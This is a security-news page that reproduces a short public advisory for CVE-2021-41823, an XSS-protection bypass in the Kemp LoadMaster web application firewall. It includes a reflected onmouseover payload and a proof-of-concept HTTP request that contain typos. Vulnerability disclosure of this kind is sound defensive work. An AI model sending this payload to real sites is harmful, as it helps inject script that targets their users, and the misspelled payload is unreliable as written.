Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-41823: 1. ADVISORY INFORMATION=======================Product: Kemp Web Appli - Pastebin.com

The Web Application Firewall (WAF) in Kemp LoadMaster 7.2.54.1 allows certain uses of onmouseover to bypass an XSS protection mechanism.

CVE
Open in Source
#xss#vulnerability#web

Untitled

a guest

Dec 30th, 2022

20

0

Never

Not a member of Pastebin yet? Sign Up, it unlocks many cool features!

text 0.56 KB | Cybersecurity | 0 0

  1. 1. ADVISORY INFORMATION

  2. =======================

  3. Product: Kemp Web Application Firewall

  4. Vendor URL: https://kemptechnologies.com/en/solutions/waf

  5. Version: 7.2.54.1

  6. Type: Bypass XSS WAF prottection

  7. Date published: 2022-12-30

  8. CVE: CVE-2021-41823

  1. 2. VULNERABILITY DETAILS

  2. ========================

  3. The kemp waf allows to bypass xss protection and inyect the following xss reflected payload "onmouseover=’promt()"

  1. 3. PROOF OF CONCEPT

  2. ===================

  3. GET /directory/vulnerable-xss.html"onmouseover=’promt()" HTTP/1.1

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE